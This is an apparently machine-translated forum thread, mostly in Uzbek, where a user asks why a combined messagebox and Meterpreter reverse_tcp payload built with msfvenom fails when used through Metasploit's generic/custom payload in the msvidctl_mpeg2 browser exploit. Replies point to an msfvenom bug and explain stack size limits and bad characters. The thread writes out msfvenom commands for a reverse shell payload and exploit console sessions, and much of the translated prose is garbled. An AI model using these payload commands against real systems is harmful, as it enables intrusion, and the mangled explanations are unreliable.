Ko'paytli yuk bilan Metasploit generic/custom payload

Msfvenom va custom/generic payload-dan foydalangan holda yangi MSF4 (Framework: 4.1.0-release.13988, Console: 4.1.0-release.13581) multipayload yordami bilan o'ynashni boshladim. kodlash va uyumluluk jihatidan foydali yuk haqida ma'lumot.

Asosan server tomoni xizmatining qanday o'chirilishini ko'rib chiqayapman, keyinchalik meterpreter uni endi bog'langan portni eshitishiga ega. (ekspluatatsiya boshqa portga tushadi)

Aslida, msfvenom yordamida exe, raw va .rb sifatida msgbox va Meterpreter yordamida qayta-qayta yuklashni yaratdim. Men kodlash sozlamasini yolg'iz qoldirib, uni yo'q qilishni sinab ko'rdim. (maxsus/generic payload .rb manbai hech qanday kodlashni faqatgina ruxsat berish haqida gapiradi)

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw

Men EXITFUNC bilan "hech" ni o'rnatdim.

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom  -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw
c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none> test\msgterp.raw

Keyinchalik xom ko'paytmali faylni umumiy/maxsus yuk tushadigan yuklardan foydalanishga yozish kerak: (xam, exe, .rb formatlariga yozishni sinab ko'rdim)

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw

Nihoyat, ko'paytma yuklarni generic/custom bilan sinab ko'rish vaqti keldi: (o'rnatish va ekspluatatsiya qilishdan oldin ekspluatatsiya har safar qayta yuklanganligini eslang)

msf > use exploit/windows/browser/msvidctl_mpeg2
msf  exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom
PAYLOAD => generic/custom

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw
PAYLOADSTR => c:\metasploit\test\msf.raw
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe
PAYLOADSTR => c:\metasploit\test\msf.exe
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw
PAYLOADFILE => c:\metasploit\test\msf.raw
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe
PAYLOADFILE => c:\metasploit\test\msf.exe
msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

Shunday qilib, "Kodlovchi kodlangan kodlar yo'q ..." deb nomlangan xato haqida nima deyilganini bilib oldim. (Http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions) Stajerning foydasi bu yerda.

Xato sababi Windows/msgbox-ning yuklanganligi sababli yuklanganmi? Yoki ko'paytmalar yuklanganmi? Keyinchalik bo'lsa, unda men ko'paytovli yuklamalar qanday ishlashini bilmayman. 2 ta yukni birlashtirib, ehtimol, bitta foydali yukdan ko'ra katta bo'ladi.

Kimdir buni kamdan-kam hollarda generic/payload yuki bilan mos keladigan kodlashlar va formatlarni tushuntirib berishi mumkinmi? Ko'p tarmoq yukini qo'llab-quvvatlash uchun faqat bir nechta havolani topdim.

Oldindan rahmat! Men buni bajarishim bilan, bu ishga qanday erishganligim haqida javob berishga va'da beraman.

0

2 javoblar

Oxirgi javob uchun uzr so'raymiz.

MSF 4.1da msfvenom bilan bog'liq bo'lgan xato, umumiy/maxsus yuk yuki emas. Men ishlab chiqarilgan foydalar 1024 baytdan kattaroq edi. Unda HDMning o'zi bu xato ekanligini ko'rsatadigan bir mavzu.

https://community.rapid7.com/thread/1332

Msfvenom uchun tuzatish bilan birga kelgan xato holati:

http://dev.metasploit.com/redmine/issues/4714

Men faqatgina bir nechta foydali yuk yordamini qo'llayotganini o'ylamayman. Msfvenomdan oldingi kulgili foydalanishimga aralashmang. Men bu savolni chop etgan paytga kelib umidsiz edim, shuning uchun men bu savolga shellcode yozishni boshlamasdan o'yladim. HDM bu xatolikni tan olganida, men yana bir marshrutga borishga qaror qilganda, 2-in-1 shellcode testini yozishni o'rganishga kirishdim. (MSF Pro Trialni ushladim va ko'p hop test stsenariyasini hal qilish uchun VPN pivosini o'rnatdim)

Javob uchun rahmat.

1
qo'shib qo'ydi

Menimcha, ba'zi bir ekspluatatsiya dinamikasini va klassik xotira buzilishini ishlatish strategiyalarini tushunish siz uchun foydali bo'ladi deb o'ylayman.

May I suggest The Art of Software Security Assessment or Shellcoder's Handbook

That said, here is what is happeneing, When you 'cave' out memory in a buffer overflow, you have a limited amount of space available for your exploit before you hit the stored stack frame & instruction pointer, The MPEG2 browser bug (which you are trying to exploit) allocates 1024 bytes on the stack which is thusly the limit of your payload, as well, it is terminated by the standard series (\x00\x09\x0a\x0d, Thats null char, stop, Carriage Return, and Line Feed respectively), which further limits you to any shellcode which is not written with this in mind.

Metasploit juda aqlli, odatda "xavfsiz" va ekspluatatsiya qilinadigan yo'riqnomalar bilan ba'zi yo'riqnomalarni o'qqa tutishi mumkin, ammo bu har doim ham iloji bo'lsa, ko'rsatmalar to'plamining ziddiyatlari, yig'ma portlashlar va hokazolar bo'lishi mumkin emas. Msfvenomning foydali yuki generatorlarga qarshi "ish" va "Metasploit" xatolarga yo'l qo'yadi.

Siz taxmin qildingizmi, bu sizning shellcode (err, men foydali yuk degan ma'noni anglatadi), sahna qilish kerak degan ma'noni anglatadi, Yaxshi bosqichga ega bo'lgan yuk odatda ko'plab xotira joylariga tarqalib ketishi va avtomatik tarzda bir-biriga qaytib kelishi uchun etarlicha mantiqiy (takroriy) bo'lishi mumkin Tuxumni ovlash degan ibora yordamida, men sizning oyoq kiyimingizda bo'lganimda, umumiy ekspluatatsiyani * windows/meterpreter/reverse_tcp * ni ishlatgan bo'lar edim, chunki men ushbu maxsus ekspluatatsiya oddiy yoki aralashtirilgan narsalarni aralashtirib yuboradi deb o'ylamayman.

Eng yaxshi imkoniyat

1
qo'shib qo'ydi